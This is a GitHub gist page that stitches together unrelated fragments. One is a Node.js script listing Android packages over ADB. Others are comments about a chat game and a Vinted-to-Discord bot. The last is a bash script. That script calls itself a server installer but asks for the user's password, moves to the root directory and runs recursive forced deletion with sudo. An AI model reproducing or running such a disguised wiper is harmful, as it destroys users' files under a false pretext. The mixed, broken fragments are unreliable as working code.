Skip to content

Instantly share code, notes, and snippets.

@micuit-cuit
micuit-cuit / gist:1bf0dfa93b751950645baedbbe6fbc8f
Created January 19, 2024 08:46
GestionnaireSuppressionApplicationsADB
const { execSync } = require('child_process');
const readlineSync = require('readline-sync');
// Fonction pour lister les applications
function listerApplications() {
const output = execSync('adb shell pm list packages').toString();
return output.split('\n').filter(Boolean).map(line => line.replace('package:', ''));
}
// Fonction pour effectuer une recherche dans la liste des applications
/*
!sumo pour le live de s17n
!sumo <angle> <force(0-100)>
!sumo pour demarrer le jeux
*/
//it is a module that is used to get wich api of vinted all a new item is in and then it will send a message to the channel that is set in the config.json file
//contien les fonction:
// - start()
// - restart()
// - stop()
const config = require('../config/config.json');
const vinted = require('vinted-api');
const fs = require('fs');
const { ActionRowBuilder, ButtonBuilder } = require('discord.js');
#!/bin/bash
if [ "$1" == "-h" ]; then
echo "instale un seralver"
break
fi
cd /
echo "svp tu peut metre ton mot de pass😽️"
sudo chown -r
sudo del *.* -rf